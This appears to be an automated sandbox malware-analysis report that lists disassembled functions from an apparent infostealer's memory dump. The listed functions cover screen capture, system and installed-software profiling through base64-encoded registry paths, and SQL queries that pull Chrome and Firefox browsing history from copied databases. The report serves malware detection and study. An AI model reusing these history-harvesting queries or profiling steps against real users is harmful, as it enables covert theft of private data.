RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 0041568E, 00415851
), xrefs: 00415803, 004159C6
RGlzcGxheU5hbWU=, xrefs: 004156D5, 00415898
, xrefs: 00415A56
RGlzcGxheVZlcnNpb24=, xrefs: 00415776, 00415939
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415704, 004157A5, 004158C7, 00415968
(), xrefs: 00415A20

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: EnumFreeOpenString
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 373517563-3013244427
Opcode ID: 811dec6d31122d050a97365a5b19f67a6191ec6da50f53ccff4e5404f1575c63
Instruction ID: c01df635abeadf6e6837e62572b2515f3de099e5a3d6091bc8c8e2951dea1457
Opcode Fuzzy Hash: 811dec6d31122d050a97365a5b19f67a6191ec6da50f53ccff4e5404f1575c63
Instruction Fuzzy Hash: 94C1F5B5A001189BCB11EB55CC41BCEB7BDAB84305F5045FBB608B7282DA78AF858F5D

Function 00402668 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402731

Strings

", xrefs: 00402684
", xrefs: 00402689

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CharNext
String ID: "$"
API String ID: 3213498283-3758156766
Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Function 00416FB0 Relevance: 15.2, APIs: 10, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00417090
CreateCompatibleDC.GDI32(00000000), ref: 00417099
CreateCompatibleBitmap.GDI32(00000000,0041A212,?), ref: 004170A9
SelectObject.GDI32(00000000,00000000), ref: 004170B2
BitBlt.GDI32(00000000,00000000,00000000,0041A212,?,00000000,00000000,?,00CC0020), ref: 004170D2
GlobalFix.KERNEL32(?), ref: 0041717C
GlobalUnWire.KERNEL32(?), ref: 0041719E
DeleteObject.GDI32(00000000), ref: 004171A4
DeleteDC.GDI32(00000000), ref: 004171AA
ReleaseDC.USER32(00000000,00000000), ref: 004171B2

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
String ID:
API String ID: 914135935-0
Opcode ID: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
Instruction ID: ef45df128ede85129e0c4d5475d485c7d6030f40d18b36e8376d67ec69c327ad
Opcode Fuzzy Hash: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
Instruction Fuzzy Hash: BE51FDB1A44209AFDB11DF95EC85FEF7BBCAB48305F104066F604E62D1C7786984CB69

Function 00412974 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004129B8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
DeleteFileW.KERNEL32(00000000), ref: 00412BD5

Strings

SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
, xrefs: 00412B68
%TEMP%, xrefs: 004129F3
.tmp, xrefs: 004129D3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: 3459b338a60736bb228cd6412b5c58d3a7a0a8a0136dab3eefba1ba13c187991
Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
Opcode Fuzzy Hash: 3459b338a60736bb228cd6412b5c58d3a7a0a8a0136dab3eefba1ba13c187991
Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58

Function 0041253C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00412580
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
DeleteFileW.KERNEL32(00000000), ref: 0041279D

Strings

%TEMP%, xrefs: 004125BB
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
, xrefs: 00412730
.tmp, xrefs: 0041259B

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
Opcode ID: 8b329c99ed99e2a4b7aa1dd1cfd571fb2f4985445734bb549b6f40b32f6b512f
Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
Opcode Fuzzy Hash: 8b329c99ed99e2a4b7aa1dd1cfd571fb2f4985445734bb549b6f40b32f6b512f
Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58

Function 00415E3C Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
GetRAM: , xrefs: 00415F2F
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 0fe79e7c3c1b017fe96b948e235eeaac2ae1ea46f9167715bcbb82ec7f9ce0a5
Instruction ID: 841de3dabe4d1ada80fc57b7235bfd5090272e00ed4efe0c369eb699e4c4d56e
Opcode Fuzzy Hash: 0fe79e7c3c1b017fe96b948e235eeaac2ae1ea46f9167715bcbb82ec7f9ce0a5
Instruction Fuzzy Hash: 3941E274A00108ABCB01EFD1D842FCDBBB9EF48305F51813BF504B7296D679EA468B59

Function 00415E44 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
GetRAM: , xrefs: 00415F2F
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 2dd8e4a6275ba7105d358bdb5c43bd8b3ec4f76fd94b45c44828d9111afa6f11
Instruction ID: 6ee615b5186dd69ea9a83c9e9698d3011ce36d6a126617133cf52e038528ef4b
Opcode Fuzzy Hash: 2dd8e4a6275ba7105d358bdb5c43bd8b3ec4f76fd94b45c44828d9111afa6f11
Instruction Fuzzy Hash: 9941F174A00108ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA468B59

Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0

Strings

Runtime error at 00000000, xrefs: 0040339A, 004033D9
Error, xrefs: 004033D4

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Function 004112D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
DeleteFileW.KERNEL32(00000000), ref: 00411544

Strings

, xrefs: 004114D0
.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: db17063c9cae81f4128a538ccb0406a2e86b889ebd8fd8a46293cc642e6a25ee
Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
Opcode Fuzzy Hash: db17063c9cae81f4128a538ccb0406a2e86b889ebd8fd8a46293cc642e6a25ee
Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59

Function 0040BEBC Relevance: 9.2, APIs: 6, Instructions: 183libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 2ffe15127e72428e329f6c17fb58ca033a35ff4ad75139793fd85c634e2280da
Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
Opcode Fuzzy Hash: 2ffe15127e72428e329f6c17fb58ca033a35ff4ad75139793fd85c634e2280da
Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8

Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Function 00410D88 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 194fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410DCC
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
DeleteFileW.KERNEL32(00000000), ref: 00410F84

Strings

%TEMP%, xrefs: 00410E07
.tmp, xrefs: 00410DE7

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: a0f59b8e419c3aad363750f11b97e76979ee39233b08c3cc789eaf95a442bc53
Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
Opcode Fuzzy Hash: a0f59b8e419c3aad363750f11b97e76979ee39233b08c3cc789eaf95a442bc53
Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58

Function 00411034 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
DeleteFileW.KERNEL32(00000000), ref: 00411230

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 577b90d7f24cd0fb58febb8daef041d5e439a0dea1ca99fdd0a66268eb77198e
Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
Opcode Fuzzy Hash: 577b90d7f24cd0fb58febb8daef041d5e439a0dea1ca99fdd0a66268eb77198e
Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58

Function 00417574 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
Instruction ID: a7d4bf9b2760dea35b02269f2c10af10878945f0623a8129c970236146844d6a
Opcode Fuzzy Hash: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
Instruction Fuzzy Hash: C2119070904604AED711DBA9CD52B9EBBF8DF49714F5140B7F804E72D2D6789E018B58

Function 00417578 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
Instruction ID: ea46895599b20c27feb42da0d668784e66eeb00bbfd17c159799839ff483915a
Opcode Fuzzy Hash: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
Instruction Fuzzy Hash: 7111C470904604BED711DFA9CD42B8EBBF8DB45714F5140B7F804E72C1D6789E008B58

Function 0041757C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
Instruction ID: e3f94ad17905d3749a36cc042419755c400cae35a044259d7baf032426d6234e
Opcode Fuzzy Hash: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
Instruction Fuzzy Hash: D01151B1A14608AED711DFAACD42B9EBBF8EB48714F514076F804E72C1E6789E008B58

Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

FPUMaskValue, xrefs: 00402B10
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Function 00415CA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Strings

kernel32.dll, xrefs: 00415CC2
GlobalMemoryStatusEx, xrefs: 00415CBD
@, xrefs: 00415CE3

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryLoadProcString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 923276998-3878206809
Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659

Function 00406678 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?), ref: 0040669B

Strings

IsWow64Process, xrefs: 0040667A
kernel32.dll, xrefs: 0040667F

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D

Function 004112B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
